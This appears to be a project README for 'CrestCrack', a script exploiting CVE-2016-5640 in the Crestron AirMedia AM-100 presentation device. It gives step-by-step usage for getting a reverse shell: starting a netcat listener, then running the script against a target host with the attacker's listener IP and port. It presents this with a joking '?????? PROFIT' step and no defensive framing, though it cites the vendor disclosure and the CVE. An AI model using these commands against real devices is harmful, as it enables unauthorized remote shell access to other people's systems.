CrestCrack is a simple script that exploits CVE-2016-5640 / CLVA-2016-05-002 within the Crestron AirMedia AM-100 (v1.1.1.11 - v1.2.1). When supplied with arguments CrestCrack will utilize netcat to create a reverse shell between your target and a netcat listener of your choice.
- Clone a copy of CrestCrack
git clone https://github.com/vpnguy/CrestCrack
2. Launch a netcat listenernc -lvp 1337
3. Execute CrestCrack against your target with your listener info./crestcrack.py https://targethost 255.255.255.255 1337
4. ?????? 5. PROFIT ###Usage: ./crescrack.py [target host] [listener IP] [listener port] ###Example: ./crescrack.py https://targethost 123.123.123.123 3311
Cylance Vulnerability Disclosure NIST CVE-2016-5640
- Error handling/bounds checking - Enhanced argument support - --help output